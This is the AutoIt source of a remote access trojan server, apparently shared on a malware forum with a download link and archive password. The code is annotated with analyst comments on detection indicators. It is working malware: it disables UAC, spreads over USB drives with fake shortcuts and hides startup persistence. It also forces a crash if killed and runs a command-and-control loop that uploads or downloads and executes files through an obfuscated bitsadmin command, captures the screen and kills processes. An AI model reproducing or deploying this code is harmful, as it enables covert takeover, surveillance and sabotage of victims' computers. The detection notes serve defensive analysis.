; Together with #RequireAdmin above, every optional action in this section
; runs elevated.
TCPStartup()
Local $sIP = TCPNameToIP("127.0.0.1")
Local $sPuerto = 81
Local $sPass = ""
Local $sServerName = "Naker90"
Global $sConect
Local $Autorun = 0
Local $sAtis = 0
Local $sSpread = 0
Local $sUAC = 0
Local $sDelay = 0
Local $sSeg = ''
; Optional start-up delay; the builder emits $sSeg as seconds * 1000.
if $sDelay = 1 then
Sleep($sSeg)
EndIf
; UAC tampering. Detection: registry writes that set EnableLUA to 0 under
; HKLM\...\Policies\System, or that set UACDisableNotify under the Security
; Center key, are high-signal events to alert on.
if $sUAC = 1 then
RegWrite('HKLM\SOFTWARE\Microsoft\Security Center', 'UACDisableNotify', 'REG_DWORD', '0')
RegWrite('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System', 'EnableLUA', 'REG_DWORD', '0')
EndIf
; Removable-media propagation; the argument 0 selects "hide" rather than
; "delete" for the files found on the drive (see Spread_USB).
if $sSpread = 1 then
Spread_USB(0)
EndIf
; Marks this process so that terminating it crashes the system (see
; ProtectProcess_BSOD). Second argument 1 = apply to the current process.
if $sAtis = 1 then
ProtectProcess_BSOD(@AutoItExe, 1)
EndIf
; Persistence. Artefact: a hidden Autorun.vbs in the current user's Startup
; folder whose WScript.Shell.Run line launches this executable's full path.
if $Autorun = 1 then
Local $sFileopen = FileOpen(@StartupDir & '\Autorun.vbs', 18)
Local $sStart = 'Set wshShell = CreateObject( "WScript.Shell" )' & @CRLF & 'wshShell.run """" & ' & chr(34) & @ScriptFullPath & chr(34) & ' & """"'
FileWrite($sFileopen, $sStart)
FileClose($sFileopen)
; 0x2 is FILE_ATTRIBUTE_HIDDEN.
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', @StartupDir & '\Autorun.vbs', 'dword', 0x2)
EndIf
; Copies this executable to every removable drive and replaces what the user
; sees at the drive root with shortcuts that point at the copy.
; Parameter: $sHideOrDelete - 0 hides the original files, any other value
;            deletes them.
;
; Artefacts on an affected drive, all at the root:
;   - a hidden copy of the executable under its own file name
;   - hidden Icon<N>.ico files, one per original entry
;   - '<original name>.lnk' shortcuts whose target is the hidden copy
;   - the original entries carrying the hidden attribute (or missing)
; Mitigation: blocking execution from removable media and showing hidden files
; during triage both defeat the lure.
Func Spread_USB($sHideOrDelete)
Local $sUSB = Detect_USB()
; With no removable drive present the whole process exits here, not just this
; function.
If $sUSB = '' Then
Exit
Else
Local $sArray = StringSplit($sUSB, '@')
; NOTE(review): StringSplit stores the element count at index 0, and the
; string from Detect_USB ends with '@', so the first and last iterations do
; not appear to name a drive. Confirm against runtime behaviour.
For $i = 0 To UBound($sArray) - 1
; Drives that already hold a file with this script's name are skipped.
If Not FileExists($sArray[$i] & '\' & @ScriptName) Then
Local $sFiles = _FileListToArray($sArray[$i] & '\')
For $si = 1 To UBound($sFiles) - 1
; Give each shortcut the icon of the entry it impersonates.
_ExtractIcon($sArray[$i] & '\' & $sFiles[$si], $sArray[$i] & '\Icon' & $si & '.ico', 1)
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', $sArray[$i] & '\Icon' & $si & '.ico', 'dword', 0x2)
FileCreateShortcut($sArray[$i] & '\' & @ScriptName, $sArray[$i] & '\' & $sFiles[$si] & '.lnk', '', '', '', $sArray[$i] & '\Icon' & $si & '.ico')
If $sHideOrDelete <> 0 Then
FileDelete($sArray[$i] & '\' & $sFiles[$si])
Else
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', $sArray[$i] & '\' & $sFiles[$si], 'dword', 0x2)
EndIf
Next
FileCopy(@ScriptFullPath, $sArray[$i] & '\' & @ScriptName)
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', $sArray[$i] & '\' & @ScriptName, 'dword', 0x2)
EndIf
Next
EndIf
EndFunc
; Saves the icon Windows associates with $source to the file $outsource.
; Parameters: $source     - path of the file whose icon is wanted
;             $outsource  - output path
;             $iconnumber - passed by reference to ExtractAssociatedIcon
; No return value; none of the DllCall results is checked for failure.
Func _ExtractIcon($source, $outsource, $iconnumber)
$Ret = DllCall("shell32", "long", "ExtractAssociatedIcon", "int", 0, "str", $source, "int*", $iconnumber)
$hIcon = $Ret[0]
_GDIPlus_Startup()
; $ghGDIPDll is not defined on this page; presumably the DLL handle kept by
; GDIPlus.au3 - confirm against the UDF version in use.
$pBitmapdll = DllCall($ghGDIPDll, "int", "GdipCreateBitmapFromHICON", "ptr", $hIcon, "int*", 0)
$pBitmap = $pBitmapdll[2]
_WinAPI_DestroyIcon($Ret[0])
; NOTE(review): this CLSID looks like the GDI+ BMP encoder, in which case the
; '.ico' files written by Spread_USB would hold bitmap data - confirm.
_GDIPlus_ImageSaveToFileEx($pBitmap, $outsource, "{557CF400-1A04-11D3-9A73-0000F81EF32E}")
_GDIPlus_ImageDispose($pBitmap)
_GDIPlus_Shutdown()
EndFunc
; Lists the removable drives as one upper-cased string, each drive followed by
; '@' (so the string ends with '@').
; Returns an empty string when DriveGetDrive reports no removable drive.
Func Detect_USB()
Local $sReturn
Local $sDriver = DriveGetDrive('REMOVABLE')
If $sDriver <> 0 Then
; Element 0 of the DriveGetDrive result holds the number of drives.
For $i = 1 To $sDriver[0]
$sReturn = $sReturn & $sDriver[$i] & '@'
Next
EndIf
Return StringUpper($sReturn)
EndFunc ;==>Detect_USB
; ---- Server (implant) main loop: connect, check in, then obey commands ----
; Network indicators visible in this loop:
;   - outbound TCP to the configured host/port, retried with no delay between
;     attempts while the controller is unreachable
;   - a cleartext check-in of '|'-separated fields ending in '|OK'
;   - cleartext command words from the controller: Refrescar, Disconect,
;     Uninstall, Disk, URL, Remote, Process, KillBSOD, Kill, WEB
; Host indicators: @TempDir\001.<ext>, @TempDir\002.jpg, @TempDir\DEL.vbs.
While 1
$sConect = TCPConnect($sIP, $sPuerto)
if $sConect = -1 or @error then ContinueLoop
Local $sAV = GetAntiVirus()
; Check-in: OS language, identifier, port, first local IP, user name, OS
; version and architecture, detected AV product, password, then 'OK'.
Local $sSend = TCPSend($sConect, @OSLang & '|' & $sServerName & '|' & $sPuerto & '|' & @IPAddress1 & '|' & @UserName & '|' & @OSVersion & ' ' & @OSArch & '|' & $sAV & '|' & $sPass & '|' & 'OK')
if @error then ContinueLoop
While 1
Local $sAcciones = TCPRecv($sConect, 2048)
if @error then ExitLoop
; Restart: launches a second copy of itself and exits.
if $sAcciones = 'Refrescar' then
ShellExecute(@ScriptFullPath)
Exit
EndIf
if $sAcciones = 'Disconect' then
TCPShutdown()
EndIf
; Self-removal through a helper script that waits 2 s and deletes the
; executable. Forensic note: the file deleted first is
; @WindowsDir\Autorun.vbs, while the persistence step writes
; @StartupDir\Autorun.vbs, so the Startup entry is left behind by this
; command; DEL.vbs also stays in @TempDir.
if $sAcciones = 'Uninstall' then
FileDelete(@WindowsDir & '\Autorun.vbs')
Local $sCode = 'WScript.Sleep 2000' & @CRLF & 'Set variable = CreateObject("Scripting.FileSystemObject")' & @CRLF & 'variable.DeleteFile "' & @ScriptFullPath & '"'
$sBath = FileOpen(@TempDir & '\DEL.vbs', 17)
FileWrite($sBath, $sCode)
FileClose($sBath)
TCPShutdown()
ShellExecute(@TempDir & '\DEL.vbs')
Exit
EndIf
; Upload-and-run: receives a file extension, then file data until a chunk
; ends in 'OK'; the data is written to @TempDir\001.<ext> and opened with
; ShellExecute. The extension is used as received, with no validation.
if $sAcciones = 'Disk' then
do
Local $sExt = TCPRecv($sConect, 1024)
until $sExt <> ''
Local $sOpen = FileOpen(@TempDir & '\001.' & $sExt, 18)
Do
Local $sData = TCPRecv($sConect, 2048)
If @error Then ExitLoop 2
If StringRight($sData, 2) = 'OK' Then ExitLoop
FileWrite($sOpen, $sData)
Until False
FileClose($sOpen)
ShellExecute(@TempDir & '\001.' & $sExt)
EndIf
; Download-and-run: receives an extension and a URL shifted by 54, undoes
; the shift and hands both to _Down.
if $sAcciones = 'URL' then
Do
Local $sExt = TCPRecv($sConect, 1024)
Until $sExt <> ''
Do
Local $sURL = TCPRecv($sConect, 3074)
Until $sURL <> ''
Local $sDescifrado = Cifrado_Simple_Descifrar($sURL, 54)
_Down($sDescifrado, $sExt)
EndIf
; Screen capture: until 'Fin' is received, each pass captures the screen to
; @TempDir/002.jpg, sends the file in 2048-byte reads and then sends 'OK'.
if $sAcciones = 'Remote' then
While 1
Local $sFin = TCPRecv($sConect, 1024)
if $sFin = 'Fin' then ExitLoop
Local $sImage = _ScreenCapture_Capture(@TempDir & '/002.jpg')
Local $sFileopen = FileOpen(@TempDir & '/002.jpg')
While 1
Local $sData = FileRead($sFileopen, 2048)
If @error then ExitLoop
TCPSend($sConect, $sData)
If @error Then ExitLoop
WEnd
FileClose($sFileopen)
TCPSend($sConect, 'OK')
WEnd
EndIf
; Process listing: one 'name|pid@' record per process, then 'OK'.
if $sAcciones = 'Process' then
Local $sProcess = ProcessList()
for $i = 1 to $sProcess[0][0]
TCPSend($sConect, $sProcess[$i][0] & '|' & $sProcess[$i][1] & '@')
Next
TCPSend($sConect, 'OK')
EndIf
; Flags the named process through ProtectProcess_BSOD and then closes it;
; with the flag set, the close is what brings the system down.
if $sAcciones = 'KillBSOD' Then
Do
Local $sProcesstoBSOD = TCPRecv($sConect, 1024)
Until $sProcesstoBSOD <> ''
ProtectProcess_BSOD($sProcesstoBSOD, 0)
Sleep(250)
ProcessClose($sProcesstoBSOD)
EndIf
if $sAcciones = 'Kill' then
Do
Local $sProcesskill = TCPRecv($sConect, 1024)
Until $sProcesskill <> ''
ProcessClose($sProcesskill)
EndIf
; The received string goes to ShellExecute as-is; nothing here restricts it
; to a web address.
if $sAcciones = 'WEB' Then
Do
Local $sWEB = TCPRecv($sConect, 2048)
Until $sWEB <> ''
ShellExecute($sWEB)
EndIf
WEnd
WEnd
; Downloads $sURL to @TempDir\001.<$sExtension> and opens the result.
; Analyst note: the literal below is shifted by 6 only to hide it from a
; strings search. Undoing the shift gives a command-interpreter '/c' argument
; that runs 'bitsadmin /transfer mjob /download /priority High', so the
; download is done by a hidden cmd.exe child that starts bitsadmin.exe.
; Detection: bitsadmin.exe started with '/transfer' by cmd.exe whose parent is
; an AutoIt-compiled binary, a transfer job named 'mjob', and a new
; @TempDir\001.* file being opened straight afterwards.
; Both $sURL and $sExtension arrive from the controller and are concatenated
; into the command line without any quoting or validation.
Func _Down($sURL, $sExtension)
ShellExecuteWait(@ComSpec , Cifrado_Simple_Descifrar('&5i&(hozygjsot&5zxgtylkx&spuh&5ju}trugj&5vxouxoz&Nomn&', 6) & $sURL & ' ' & @TempDir & '\001.' & $sExtension & ' ' , '' , '' , @SW_HIDE)
ShellExecute(@TempDir & '\001.' & $sExtension)
EndFunc
; Inverse of the controller's Cifrado_Simple_Cifrar: subtracts $numero from the
; character code of each character of $texto and returns the result.
; Called with 54 for URLs received from the controller and with 6 for the
; command-line literal embedded in _Down. Both keys are constants on this page,
; so captured traffic and the embedded literal decode offline.
Func Cifrado_Simple_Descifrar($texto, $numero)
$Resultado = ''
For $i = 1 to StringLen($texto)
; Asc() uses only the first character of the substring StringMid returns.
$Resultado = $Resultado & Chr(Asc(StringMid($texto, $i)) - $numero)
next
Return $Resultado
EndFunc
; Guesses the installed security product from running process names and returns
; a display string for the check-in; 'Desconocido' when none of the names is
; found.
; The checks are independent, not an If/ElseIf chain, so when several of the
; processes are running the last match in this list is the one reported.
; Detection: one process probing for this particular set of AV process names in
; quick succession is reconnaissance behaviour worth flagging.
Func GetAntiVirus()
Local $sReturn
If ProcessExists('AvastUI.exe') then
$sReturn = 'Avast Free Antivirus'
EndIf
; NOTE(review): ProcessExists returns a PID, so the '= True' comparisons below
; depend on AutoIt's number-to-boolean comparison rules - confirm they behave
; the same as the bare test used for AvastUI.exe.
If ProcessExists('avgui.exe')= True Then
$sReturn = 'AVG Internet Security'
EndIf
If ProcessExists('avgnt.exe')= True Then
$sReturn = 'Avira Free Antivirus'
EndIf
If ProcessExists('egui.exe') = True Then
$sReturn = 'Eset NOD32'
EndIf
If ProcessExists('Avp.exe') = True Then
$sReturn = 'Kaspersky Anti-Virus'
EndIf
If ProcessExists('msseces.exe') = True Then
$sReturn = 'Microsoft Security Essentials'
EndIf
If ProcessExists('Cistray.exe') = True Then
$sReturn = 'Comodo Free Antivirus'
EndIf
if ProcessExists('a2cmd.exe') = true Then
$sReturn = 'Asquared Free Antivirus'
EndIf
if ProcessExists('bdagexec.exe') = true Then
$sReturn = 'Bitdefender Antivirus Software'
EndIf
if $sReturn = '' then
$sReturn = 'Desconocido'
EndIf
Return $sReturn
EndFunc
; Sets the "break on termination" flag on a process, so that ending the process
; makes Windows bugcheck.
; Parameters: $sProcessName - name of the target process (used when $Mio = 0)
;             $Mio          - 0 targets $sProcessName; any other value targets
;                             the current process (@AutoItPID)
; No return value; none of the calls is checked for failure.
;
; Responder notes: a process flagged this way should not be killed from Task
; Manager or an EDR console until the flag has been cleared, since terminating
; it is what triggers the crash. Telemetry to look for: a non-system process
; enabling SeDebugPrivilege, opening a process with the all-access mask below
; and calling NtSetInformationProcess with information class 29.
Func ProtectProcess_BSOD($sProcessName, $Mio)
; 29 is the ProcessBreakOnTermination information class.
Const $sPriority = 29
Const $sProcess_All_Access = 0x1F0FFF
Const $sTokenAdjustPrivileges = 0x20
Const $sTokenQuery = 0x0008
Local $sHandle
; ProcessExists returns 0 when no such process is running; that value is used
; below unchecked.
Local $sPID = ProcessExists($sProcessName)
; Setting the flag requires SeDebugPrivilege, which is enabled on the token
; here. This is consistent with the #RequireAdmin directive at the top of the
; server script.
Local $sOpenThreadToken = _Security__OpenThreadTokenEx (BitOR($sTokenAdjustPrivileges, $sTokenQuery))
_Security__SetPrivilege($sOpenThreadToken, 'SeDebugPrivilege', True)
DllCall('Kernel32.dll', 'int', 'CloseHandle', 'handle', $sOpenThreadToken)
if $Mio = 0 Then
$sHandle = DllCall('Kernel32.dll', 'handle', 'OpenProcess', 'dword', $sProcess_All_Access, 'bool', True, 'dword', $sPID)
Else
$sHandle = DllCall('Kernel32.dll', 'handle', 'OpenProcess', 'dword', $sProcess_All_Access, 'bool', True, 'dword', @AutoItPID)
EndIf
; A 4-byte structure holding True is the new value of the flag.
Local $sStruct = DllStructCreate('bool BSOD')
DllStructSetData($sStruct, 'BSOD', True)
DllCall('Ntdll.dll', 'int', 'NtSetInformationProcess', 'handle', $sHandle[0], 'int', $sPriority, 'int', DllStructGetPtr($sStruct), 'int', 4)
DllCall('Kernel32.dll', 'int', 'CloseHandle', 'handle', $sHandle[0])
EndFunc
Link: [Enlace externo eliminado para invitados]
Pass: Indetectables.net
Saludos